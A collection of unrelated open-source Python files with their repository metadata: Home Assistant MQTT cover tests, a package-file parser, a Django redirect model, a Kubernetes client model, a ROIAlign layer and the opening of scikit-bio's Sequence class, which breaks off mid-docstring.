        "Template (position_template) returned JSON without position attribute"
        in caplog.text
    )
async def test_position_and_tilt_via_position_topic_template_return_json(
    hass, mqtt_mock
):
    """Test position and tilt by updating the position via position template."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "set_position_topic": "set-position-topic",
                "position_topic": "get-position-topic",
                # One JSON payload drives both position and tilt_position.
                "position_template": '\
                {{ {"position" : value, "tilt_position" : (value | int / 2)| int } | tojson }}',
            }
        },
    )
    await hass.async_block_till_done()
    async_fire_mqtt_message(hass, "get-position-topic", "0")
    current_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    current_tilt_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_TILT_POSITION
    ]
    assert current_cover_position == 0 and current_tilt_position == 0
    async_fire_mqtt_message(hass, "get-position-topic", "99")
    current_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    current_tilt_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_TILT_POSITION
    ]
    assert current_cover_position == 99 and current_tilt_position == 49
async def test_position_via_position_topic_template_all_variables(hass, mqtt_mock):
    """Test position by updating status via position template."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "set_position_topic": "set-position-topic",
                "position_topic": "get-position-topic",
                "tilt_command_topic": "tilt-command-topic",
                "position_open": 99,
                "position_closed": 1,
                "tilt_min": 11,
                "tilt_max": 22,
                # Exercises that all config variables (tilt_min/max,
                # position_open/closed) are available inside the template.
                "position_template": "\
                {% if value | int < tilt_max %}\
                {{ tilt_min }}\
                {% endif %}\
                {% if value | int > position_closed %}\
                {{ position_open }}\
                {% endif %}",
            }
        },
    )
    await hass.async_block_till_done()
    async_fire_mqtt_message(hass, "get-position-topic", "0")
    current_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position == 10
    async_fire_mqtt_message(hass, "get-position-topic", "55")
    current_cover_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position == 100
async def test_set_state_via_stopped_state_no_position_topic(hass, mqtt_mock):
    """Test the controlling state via stopped state when no position topic."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "state_open": "OPEN",
                "state_closed": "CLOSE",
                "state_stopped": "STOPPED",
                "state_opening": "OPENING",
                "state_closing": "CLOSING",
                "command_topic": "command-topic",
                "qos": 0,
                "optimistic": False,
            }
        },
    )
    await hass.async_block_till_done()
    async_fire_mqtt_message(hass, "state-topic", "OPEN")
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
    async_fire_mqtt_message(hass, "state-topic", "OPENING")
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPENING
    # Without a position topic, STOPPED resolves based on the direction of
    # the last movement: stopped after OPENING -> open, after CLOSING -> closed.
    async_fire_mqtt_message(hass, "state-topic", "STOPPED")
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
    async_fire_mqtt_message(hass, "state-topic", "CLOSING")
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSING
    async_fire_mqtt_message(hass, "state-topic", "STOPPED")
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
async def test_position_via_position_topic_template_return_invalid_json(
    hass, caplog, mqtt_mock
):
    """Test position by updating status via position template and returning invalid json."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "set_position_topic": "set-position-topic",
                "position_topic": "get-position-topic",
                # Renders a Python-dict-style repr, not valid JSON.
                "position_template": '{{ {"position" : invalid_json} }}',
            }
        },
    )
    await hass.async_block_till_done()
    async_fire_mqtt_message(hass, "get-position-topic", "55")
    assert ("Payload '{'position': Undefined}' is not numeric") in caplog.text
# The tests below each configure one template/topic option without its
# required counterpart and assert the matching validation error is logged.
async def test_set_position_topic_without_get_position_topic_error(
    hass, caplog, mqtt_mock
):
    """Test error when set_position_topic is used without position_topic."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "command_topic": "command-topic",
                "set_position_topic": "set-position-topic",
                "value_template": "{{100-62}}",
            }
        },
    )
    await hass.async_block_till_done()
    assert (
        f"'{CONF_SET_POSITION_TOPIC}' must be set together with '{CONF_GET_POSITION_TOPIC}'."
    ) in caplog.text
async def test_value_template_without_state_topic_error(hass, caplog, mqtt_mock):
    """Test error when value_template is used and state_topic is missing."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "command_topic": "command-topic",
                "value_template": "{{100-62}}",
            }
        },
    )
    await hass.async_block_till_done()
    assert (
        f"'{CONF_VALUE_TEMPLATE}' must be set together with '{CONF_STATE_TOPIC}'."
    ) in caplog.text
async def test_position_template_without_position_topic_error(hass, caplog, mqtt_mock):
    """Test error when position_template is used and position_topic is missing."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "command_topic": "command-topic",
                "position_template": "{{100-52}}",
            }
        },
    )
    await hass.async_block_till_done()
    assert (
        f"'{CONF_GET_POSITION_TEMPLATE}' must be set together with '{CONF_GET_POSITION_TOPIC}'."
        in caplog.text
    )
async def test_set_position_template_without_set_position_topic(
    hass, caplog, mqtt_mock
):
    """Test error when set_position_template is used and set_position_topic is missing."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "command_topic": "command-topic",
                "set_position_template": "{{100-42}}",
            }
        },
    )
    await hass.async_block_till_done()
    assert (
        f"'{CONF_SET_POSITION_TEMPLATE}' must be set together with '{CONF_SET_POSITION_TOPIC}'."
        in caplog.text
    )
async def test_tilt_command_template_without_tilt_command_topic(
    hass, caplog, mqtt_mock
):
    """Test error when tilt_command_template is used and tilt_command_topic is missing."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "command_topic": "command-topic",
                "tilt_command_template": "{{100-32}}",
            }
        },
    )
    await hass.async_block_till_done()
    assert (
        f"'{CONF_TILT_COMMAND_TEMPLATE}' must be set together with '{CONF_TILT_COMMAND_TOPIC}'."
        in caplog.text
    )
async def test_tilt_status_template_without_tilt_status_topic_topic(
    hass, caplog, mqtt_mock
):
    """Test error when tilt_status_template is used and tilt_status_topic is missing."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "command_topic": "command-topic",
                "tilt_status_template": "{{100-22}}",
            }
        },
    )
    await hass.async_block_till_done()
    assert (
        f"'{CONF_TILT_STATUS_TEMPLATE}' must be set together with '{CONF_TILT_STATUS_TOPIC}'."
        in caplog.text
    )
|
{
"content_hash": "9c12c719f4530f0853da3388a51c183c",
"timestamp": "",
"source": "github",
"line_count": 3059,
"max_line_length": 107,
"avg_line_length": 32.10624387054593,
"alnum_prop": 0.5565658314072475,
"repo_name": "home-assistant/home-assistant",
"id": "794d143ac832a69b52404f6643e4698173c3e6b1",
"size": "98213",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "tests/components/mqtt/test_cover.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "20557383"
},
{
"name": "Shell",
"bytes": "6671"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from wtl.wtparser import parsers
__all__ = ['parse', 'get_parser_for_filename']
def parse(content, filetype=None):
    """
    Parse the packages file and return the data in the following format::

        {
            'filename': 'Gemfile',
            'language': 'Objective-C',
            'platform': 'ios',
            'version': '7.0',
            'packages': [
                {
                    'name': 'Django',
                    'version': '1.7',
                },
            ]
        }

    :param content: the package file contents
    :param filetype: the package file type, for example `requirements`,
        `gemfile`, `podfile`. May be `None` to ask the parser to detect the
        type automatically.
    """
    # Auto-detect the parser from the content unless a type was given.
    if filetype is None:
        selected_parser = guess(content)
    else:
        selected_parser = load(filetype)
    return selected_parser.parse(content)
def get_parser_for_filename(filename):
    """Return an instance of the parser registered for *filename*, or None."""
    candidates = (load_by_name(parser_name)() for parser_name in parsers.available_parsers)
    matching = (candidate for candidate in candidates if candidate.filename == filename)
    return next(matching, None)
def guess(content):
    """Return the first available parser whose detect() accepts *content*.

    Raises AttributeError when no parser recognises the content.
    """
    for parser_name in parsers.available_parsers:
        candidate = load_by_name(parser_name)()
        if candidate.detect(content):
            return candidate
    # No parser recognised the content; keep the historical exception type.
    raise AttributeError('No parser for this file.')
def load(filetype):
    """Instantiate the parser class registered for *filetype* (e.g. 'gemfile')."""
    class_name = '{0}Parser'.format(filetype.capitalize())
    return load_by_name(class_name)()
def load_by_name(name):
    """Look up a parser class by its class name on the parsers package."""
    parser_class = getattr(parsers, name)
    return parser_class
|
{
"content_hash": "c50ed1785df3b26ca1fd136b75879125",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 75,
"avg_line_length": 26,
"alnum_prop": 0.5810439560439561,
"repo_name": "elegion/djangodash2013",
"id": "a5419703ee1b1249474bc35cbae80d83420dfefc",
"size": "1456",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wtl/wtparser/parser.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "312"
},
{
"name": "JavaScript",
"bytes": "31"
},
{
"name": "Python",
"bytes": "50900"
}
],
"symlink_target": ""
}
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import python_2_unicode_compatible
# Fix: python_2_unicode_compatible is imported at the top of this module but
# was never applied; without it the __str__ method below does not produce a
# proper __unicode__ on Python 2 (this module targets Py2/Py3 via six-era
# Django utilities).
@python_2_unicode_compatible
class Redirect(models.Model):
    """A stored URL redirect, optionally matched via regular expressions.

    Plain redirects match ``old_path`` exactly; when ``regular_expression``
    is set, both paths are treated as regex pattern/replacement. A
    ``fallback_redirect`` is only tried after all other redirects failed.
    """
    old_path = models.CharField(_('redirect from'), max_length=200, db_index=True, unique=True,
        help_text=_("This should be an absolute path, excluding the domain name. Example: '/events/search/'."))
    new_path = models.CharField(_('redirect to'), max_length=200, blank=True,
        help_text=_("This can be either an absolute path (as above) or a full URL starting with 'http://'."))
    regular_expression = models.BooleanField(_('Match using regular expressions'),
        default=False,
        help_text=_("If checked, the redirect-from and redirect-to fields will also be processed using regular expressions when matching incoming requests.<br>Example: <strong>/projects/.* -> /#!/projects</strong> will redirect everyone visiting a page starting with /projects/<br>Example: <strong>/projects/(.*) -> /#!/projects/$1</strong> will turn /projects/myproject into /#!/projects/myproject<br><br>Invalid regular expressions will be ignored."))
    fallback_redirect = models.BooleanField(_("Fallback redirect"),
        default=False,
        help_text=_("This redirect is only matched after all other redirects have failed to match.<br>This allows us to define a general 'catch-all' that is only used as a fallback after more specific redirects have been attempted."))
    # Incremented each time a visitor hits this redirect.
    nr_times_visited = models.IntegerField(default=0,
        help_text=_("Is incremented each time a visitor hits this redirect"))
    class Meta:
        verbose_name = _('redirect')
        verbose_name_plural = _('redirects')
        db_table = 'django_redirect'
        # Specific redirects sort before regex ones, fallbacks last.
        ordering = ('fallback_redirect', 'regular_expression', 'old_path',)
    def __str__(self):
        return "%s ---> %s" % (self.old_path, self.new_path)
|
{
"content_hash": "97c8e784c5db6fad7d0b9f454d14527e",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 490,
"avg_line_length": 74,
"alnum_prop": 0.637065637065637,
"repo_name": "onepercentclub/onepercentclub-site",
"id": "d5879c504623da7d65193e61fa64286626fb362d",
"size": "2072",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "apps/redirects/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "13896"
},
{
"name": "CSS",
"bytes": "351343"
},
{
"name": "HTML",
"bytes": "898027"
},
{
"name": "Handlebars",
"bytes": "246489"
},
{
"name": "JavaScript",
"bytes": "168884"
},
{
"name": "Python",
"bytes": "1511371"
},
{
"name": "Ruby",
"bytes": "1050"
},
{
"name": "Shell",
"bytes": "74046"
}
],
"symlink_target": ""
}
|
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.25
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V2HorizontalPodAutoscalerSpec(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Python attribute name -> OpenAPI model type, used by to_dict() and
    # the client's generic (de)serializer.
    openapi_types = {
        'behavior': 'V2HorizontalPodAutoscalerBehavior',
        'max_replicas': 'int',
        'metrics': 'list[V2MetricSpec]',
        'min_replicas': 'int',
        'scale_target_ref': 'V2CrossVersionObjectReference'
    }
    # Python attribute name -> JSON key in the Kubernetes API payload.
    attribute_map = {
        'behavior': 'behavior',
        'max_replicas': 'maxReplicas',
        'metrics': 'metrics',
        'min_replicas': 'minReplicas',
        'scale_target_ref': 'scaleTargetRef'
    }
    def __init__(self, behavior=None, max_replicas=None, metrics=None, min_replicas=None, scale_target_ref=None, local_vars_configuration=None):  # noqa: E501
        """V2HorizontalPodAutoscalerSpec - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration
        self._behavior = None
        self._max_replicas = None
        self._metrics = None
        self._min_replicas = None
        self._scale_target_ref = None
        self.discriminator = None
        # max_replicas and scale_target_ref are always assigned (required by
        # the schema; their setters validate non-None); the rest are optional.
        if behavior is not None:
            self.behavior = behavior
        self.max_replicas = max_replicas
        if metrics is not None:
            self.metrics = metrics
        if min_replicas is not None:
            self.min_replicas = min_replicas
        self.scale_target_ref = scale_target_ref
    @property
    def behavior(self):
        """Gets the behavior of this V2HorizontalPodAutoscalerSpec.  # noqa: E501

        :return: The behavior of this V2HorizontalPodAutoscalerSpec.  # noqa: E501
        :rtype: V2HorizontalPodAutoscalerBehavior
        """
        return self._behavior
    @behavior.setter
    def behavior(self, behavior):
        """Sets the behavior of this V2HorizontalPodAutoscalerSpec.

        :param behavior: The behavior of this V2HorizontalPodAutoscalerSpec.  # noqa: E501
        :type: V2HorizontalPodAutoscalerBehavior
        """
        self._behavior = behavior
    @property
    def max_replicas(self):
        """Gets the max_replicas of this V2HorizontalPodAutoscalerSpec.  # noqa: E501

        maxReplicas is the upper limit for the number of replicas to which the autoscaler can scale up. It cannot be less that minReplicas.  # noqa: E501

        :return: The max_replicas of this V2HorizontalPodAutoscalerSpec.  # noqa: E501
        :rtype: int
        """
        return self._max_replicas
    @max_replicas.setter
    def max_replicas(self, max_replicas):
        """Sets the max_replicas of this V2HorizontalPodAutoscalerSpec.

        maxReplicas is the upper limit for the number of replicas to which the autoscaler can scale up. It cannot be less that minReplicas.  # noqa: E501

        :param max_replicas: The max_replicas of this V2HorizontalPodAutoscalerSpec.  # noqa: E501
        :type: int
        """
        # Required field: reject None when client-side validation is enabled.
        if self.local_vars_configuration.client_side_validation and max_replicas is None:  # noqa: E501
            raise ValueError("Invalid value for `max_replicas`, must not be `None`")  # noqa: E501
        self._max_replicas = max_replicas
    @property
    def metrics(self):
        """Gets the metrics of this V2HorizontalPodAutoscalerSpec.  # noqa: E501

        metrics contains the specifications for which to use to calculate the desired replica count (the maximum replica count across all metrics will be used). The desired replica count is calculated multiplying the ratio between the target value and the current value by the current number of pods. Ergo, metrics used must decrease as the pod count is increased, and vice-versa. See the individual metric source types for more information about how each type of metric must respond. If not set, the default metric will be set to 80% average CPU utilization.  # noqa: E501

        :return: The metrics of this V2HorizontalPodAutoscalerSpec.  # noqa: E501
        :rtype: list[V2MetricSpec]
        """
        return self._metrics
    @metrics.setter
    def metrics(self, metrics):
        """Sets the metrics of this V2HorizontalPodAutoscalerSpec.

        metrics contains the specifications for which to use to calculate the desired replica count (the maximum replica count across all metrics will be used). The desired replica count is calculated multiplying the ratio between the target value and the current value by the current number of pods. Ergo, metrics used must decrease as the pod count is increased, and vice-versa. See the individual metric source types for more information about how each type of metric must respond. If not set, the default metric will be set to 80% average CPU utilization.  # noqa: E501

        :param metrics: The metrics of this V2HorizontalPodAutoscalerSpec.  # noqa: E501
        :type: list[V2MetricSpec]
        """
        self._metrics = metrics
    @property
    def min_replicas(self):
        """Gets the min_replicas of this V2HorizontalPodAutoscalerSpec.  # noqa: E501

        minReplicas is the lower limit for the number of replicas to which the autoscaler can scale down. It defaults to 1 pod. minReplicas is allowed to be 0 if the alpha feature gate HPAScaleToZero is enabled and at least one Object or External metric is configured. Scaling is active as long as at least one metric value is available.  # noqa: E501

        :return: The min_replicas of this V2HorizontalPodAutoscalerSpec.  # noqa: E501
        :rtype: int
        """
        return self._min_replicas
    @min_replicas.setter
    def min_replicas(self, min_replicas):
        """Sets the min_replicas of this V2HorizontalPodAutoscalerSpec.

        minReplicas is the lower limit for the number of replicas to which the autoscaler can scale down. It defaults to 1 pod. minReplicas is allowed to be 0 if the alpha feature gate HPAScaleToZero is enabled and at least one Object or External metric is configured. Scaling is active as long as at least one metric value is available.  # noqa: E501

        :param min_replicas: The min_replicas of this V2HorizontalPodAutoscalerSpec.  # noqa: E501
        :type: int
        """
        self._min_replicas = min_replicas
    @property
    def scale_target_ref(self):
        """Gets the scale_target_ref of this V2HorizontalPodAutoscalerSpec.  # noqa: E501

        :return: The scale_target_ref of this V2HorizontalPodAutoscalerSpec.  # noqa: E501
        :rtype: V2CrossVersionObjectReference
        """
        return self._scale_target_ref
    @scale_target_ref.setter
    def scale_target_ref(self, scale_target_ref):
        """Sets the scale_target_ref of this V2HorizontalPodAutoscalerSpec.

        :param scale_target_ref: The scale_target_ref of this V2HorizontalPodAutoscalerSpec.  # noqa: E501
        :type: V2CrossVersionObjectReference
        """
        # Required field: reject None when client-side validation is enabled.
        if self.local_vars_configuration.client_side_validation and scale_target_ref is None:  # noqa: E501
            raise ValueError("Invalid value for `scale_target_ref`, must not be `None`")  # noqa: E501
        self._scale_target_ref = scale_target_ref
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively convert nested models (anything with to_dict), lists
        # of models, and dicts of models into plain Python structures.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, V2HorizontalPodAutoscalerSpec):
            return False
        # Equality is structural: compare the fully-expanded dict forms.
        return self.to_dict() == other.to_dict()
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, V2HorizontalPodAutoscalerSpec):
            return True
        return self.to_dict() != other.to_dict()
|
{
"content_hash": "bd2a7ee9e92902af817393bc982ff627",
"timestamp": "",
"source": "github",
"line_count": 230,
"max_line_length": 576,
"avg_line_length": 40.76521739130435,
"alnum_prop": 0.6546501706484642,
"repo_name": "kubernetes-client/python",
"id": "afc682b7b6177ea4e11d90e86369e7f14bfcffa7",
"size": "9393",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kubernetes/client/models/v2_horizontal_pod_autoscaler_spec.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "356"
},
{
"name": "Python",
"bytes": "11454299"
},
{
"name": "Shell",
"bytes": "43108"
}
],
"symlink_target": ""
}
|
import torch
from torch import nn
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.nn.modules.utils import _pair
from maskrcnn_benchmark import _C
from apex import amp
class _ROIAlign(Function):
    """Autograd wrapper around the native ROIAlign kernels in ``_C``.

    ``forward``/``backward`` delegate to ``_C.roi_align_forward`` /
    ``_C.roi_align_backward``; the context carries everything the backward
    kernel needs to rebuild an input-shaped gradient.
    """

    @staticmethod
    def forward(ctx, input, roi, output_size, spatial_scale, sampling_ratio):
        """Pool each ``roi`` region of ``input`` to a fixed spatial size.

        All configuration is stashed on ``ctx`` for the backward pass.
        """
        ctx.save_for_backward(roi)
        # Normalize up front so an int output_size (e.g. 7) behaves like
        # (7, 7). The previous code indexed the raw argument below, which
        # failed for a plain int even though ctx stored the _pair() form.
        output_size = _pair(output_size)
        ctx.output_size = output_size
        ctx.spatial_scale = spatial_scale
        ctx.sampling_ratio = sampling_ratio
        ctx.input_shape = input.size()
        output = _C.roi_align_forward(
            input, roi, spatial_scale, output_size[0], output_size[1], sampling_ratio
        )
        return output

    @staticmethod
    @once_differentiable
    def backward(ctx, grad_output):
        """Scatter ``grad_output`` back into an input-shaped gradient.

        Only ``input`` receives a gradient; the remaining forward arguments
        are non-differentiable, hence the trailing ``None``s.
        """
        rois, = ctx.saved_tensors
        output_size = ctx.output_size
        spatial_scale = ctx.spatial_scale
        sampling_ratio = ctx.sampling_ratio
        bs, ch, h, w = ctx.input_shape
        grad_input = _C.roi_align_backward(
            grad_output,
            rois,
            spatial_scale,
            output_size[0],
            output_size[1],
            bs,
            ch,
            h,
            w,
            sampling_ratio,
        )
        return grad_input, None, None, None, None
# Functional entry point:
# roi_align(input, rois, output_size, spatial_scale, sampling_ratio)
roi_align = _ROIAlign.apply
class ROIAlign(nn.Module):
    """``nn.Module`` wrapper around the :func:`roi_align` autograd op."""

    def __init__(self, output_size, spatial_scale, sampling_ratio):
        """Store the pooling configuration.

        output_size: spatial size of the pooled output.
        spatial_scale: factor mapping box coordinates into feature-map space.
        sampling_ratio: number of sampling points per output bin.
        """
        super(ROIAlign, self).__init__()
        self.output_size = output_size
        self.spatial_scale = spatial_scale
        self.sampling_ratio = sampling_ratio

    @amp.float_function
    def forward(self, input, rois):
        """Apply ROIAlign to ``input`` for ``rois`` (runs in fp32 under amp)."""
        return roi_align(
            input, rois, self.output_size, self.spatial_scale, self.sampling_ratio
        )

    def __repr__(self):
        fields = (
            "output_size=" + str(self.output_size),
            "spatial_scale=" + str(self.spatial_scale),
            "sampling_ratio=" + str(self.sampling_ratio),
        )
        return self.__class__.__name__ + "(" + ", ".join(fields) + ")"
|
{
"content_hash": "926bed69d2941b59a3d580ffcb0a972b",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 85,
"avg_line_length": 30.61764705882353,
"alnum_prop": 0.5965417867435159,
"repo_name": "mlperf/training_results_v0.6",
"id": "e68c96b6c0444989e9c1d1a07b9d5e97da2b2eb3",
"size": "2221",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "NVIDIA/benchmarks/maskrcnn/implementations/pytorch/maskrcnn_benchmark/layers/roi_align.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "1731"
},
{
"name": "Batchfile",
"bytes": "13941"
},
{
"name": "C",
"bytes": "208630"
},
{
"name": "C++",
"bytes": "10999411"
},
{
"name": "CMake",
"bytes": "129712"
},
{
"name": "CSS",
"bytes": "64767"
},
{
"name": "Clojure",
"bytes": "396764"
},
{
"name": "Cuda",
"bytes": "2272433"
},
{
"name": "Dockerfile",
"bytes": "67820"
},
{
"name": "Groovy",
"bytes": "62557"
},
{
"name": "HTML",
"bytes": "19753082"
},
{
"name": "Java",
"bytes": "166294"
},
{
"name": "JavaScript",
"bytes": "71846"
},
{
"name": "Julia",
"bytes": "408765"
},
{
"name": "Jupyter Notebook",
"bytes": "2713169"
},
{
"name": "Lua",
"bytes": "4430"
},
{
"name": "MATLAB",
"bytes": "34903"
},
{
"name": "Makefile",
"bytes": "115694"
},
{
"name": "Perl",
"bytes": "1535873"
},
{
"name": "Perl 6",
"bytes": "7280"
},
{
"name": "PowerShell",
"bytes": "6150"
},
{
"name": "Python",
"bytes": "24905683"
},
{
"name": "R",
"bytes": "351865"
},
{
"name": "Roff",
"bytes": "293052"
},
{
"name": "Scala",
"bytes": "1189019"
},
{
"name": "Shell",
"bytes": "794096"
},
{
"name": "Smalltalk",
"bytes": "3497"
},
{
"name": "TypeScript",
"bytes": "361164"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, print_function
from future.builtins import range, zip
from future.utils import viewitems
import six
import re
import collections
import copy
import numbers
from contextlib import contextmanager
import numpy as np
from scipy.spatial.distance import hamming
import pandas as pd
from skbio._base import SkbioObject
from skbio.sequence._repr import _SequenceReprBuilder
from skbio.util._decorator import stable, experimental, classonlymethod
class Sequence(collections.Sequence, SkbioObject):
"""Store biological sequence data and optional associated metadata.
``Sequence`` objects do not enforce an alphabet and are thus the most
generic objects for storing biological sequence data. Subclasses ``DNA``,
``RNA``, and ``Protein`` enforce the IUPAC character set [1]_ for, and
provide operations specific to, each respective molecule type.
``Sequence`` objects consist of the underlying sequence data, as well
as optional metadata and positional metadata. The underlying sequence
is immutable, while the metdata and positional metadata are mutable.
Parameters
----------
sequence : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Characters representing the biological sequence itself.
metadata : dict, optional
Arbitrary metadata which applies to the entire sequence. A shallow copy
of the ``dict`` will be made (see Examples section below for details).
positional_metadata : pd.DataFrame consumable, optional
Arbitrary per-character metadata (e.g., sequence read quality
scores). Must be able to be passed directly to ``pd.DataFrame``
constructor. Each column of metadata must be the same length as the
biological sequence. A shallow copy of the positional metadata will be
made if necessary (see Examples section below for details).
lowercase : bool or str, optional
If ``True``, lowercase sequence characters will be converted to
uppercase characters. If ``False``, no characters will be converted.
If a str, it will be treated as a key into the positional metadata of
the object. All lowercase characters will be converted to uppercase,
and a ``True`` value will be stored in a boolean array in the
positional metadata under the key.
Attributes
----------
values
metadata
positional_metadata
observed_chars
See Also
--------
DNA
RNA
Protein
References
----------
.. [1] Nomenclature for incompletely specified bases in nucleic acid
sequences: recommendations 1984.
Nucleic Acids Res. May 10, 1985; 13(9): 3021-3030.
A Cornish-Bowden
Examples
--------
>>> from pprint import pprint
>>> from skbio import Sequence
**Creating sequences:**
Create a sequence without any metadata:
>>> seq = Sequence('GGUCGUGAAGGA')
>>> seq
Sequence
---------------
Stats:
length: 12
---------------
0 GGUCGUGAAG GA
Create a sequence with metadata and positional metadata:
>>> metadata = {'id':'seq-id', 'desc':'seq desc', 'authors': ['Alice']}
>>> positional_metadata = {'quality': [3, 3, 4, 10],
... 'exons': [True, True, False, True]}
>>> seq = Sequence('ACGT', metadata=metadata,
... positional_metadata=positional_metadata)
>>> seq
Sequence
-----------------------------
Metadata:
'authors': <class 'list'>
'desc': 'seq desc'
'id': 'seq-id'
Positional metadata:
'exons': <dtype: bool>
'quality': <dtype: int64>
Stats:
length: 4
-----------------------------
0 ACGT
**Retrieving underlying sequence data:**
Retrieve underlying sequence:
>>> seq.values # doctest: +NORMALIZE_WHITESPACE
array([b'A', b'C', b'G', b'T'],
dtype='|S1')
Underlying sequence immutable:
>>> seq.values = np.array([b'T', b'C', b'G', b'A'], dtype='|S1')
Traceback (most recent call last):
...
AttributeError: can't set attribute
>>> seq.values[0] = b'T'
Traceback (most recent call last):
...
ValueError: assignment destination is read-only
**Retrieving sequence metadata:**
Retrieve metadata:
>>> pprint(seq.metadata) # using pprint to display dict in sorted order
{'authors': ['Alice'], 'desc': 'seq desc', 'id': 'seq-id'}
Retrieve positional metadata:
>>> seq.positional_metadata
exons quality
0 True 3
1 True 3
2 False 4
3 True 10
**Updating sequence metadata:**
.. warning:: Be aware that a shallow copy of ``metadata`` and
``positional_metadata`` is made for performance. Since a deep copy is
not made, changes made to mutable Python objects stored as metadata may
affect the metadata of other ``Sequence`` objects or anything else that
shares a reference to the object. The following examples illustrate this
behavior.
First, let's create a sequence and update its metadata:
>>> metadata = {'id':'seq-id', 'desc':'seq desc', 'authors': ['Alice']}
>>> seq = Sequence('ACGT', metadata=metadata)
>>> seq.metadata['id'] = 'new-id'
>>> seq.metadata['pubmed'] = 12345
>>> pprint(seq.metadata)
{'authors': ['Alice'], 'desc': 'seq desc', 'id': 'new-id', 'pubmed': 12345}
Note that the original metadata dictionary (stored in variable
``metadata``) hasn't changed because a shallow copy was made:
>>> pprint(metadata)
{'authors': ['Alice'], 'desc': 'seq desc', 'id': 'seq-id'}
>>> seq.metadata == metadata
False
Note however that since only a *shallow* copy was made, updates to mutable
objects will also change the original metadata dictionary:
>>> seq.metadata['authors'].append('Bob')
>>> seq.metadata['authors']
['Alice', 'Bob']
>>> metadata['authors']
['Alice', 'Bob']
This behavior can also occur when manipulating a sequence that has been
derived from another sequence:
>>> subseq = seq[1:3]
>>> subseq
Sequence
-----------------------------
Metadata:
'authors': <class 'list'>
'desc': 'seq desc'
'id': 'new-id'
'pubmed': 12345
Stats:
length: 2
-----------------------------
0 CG
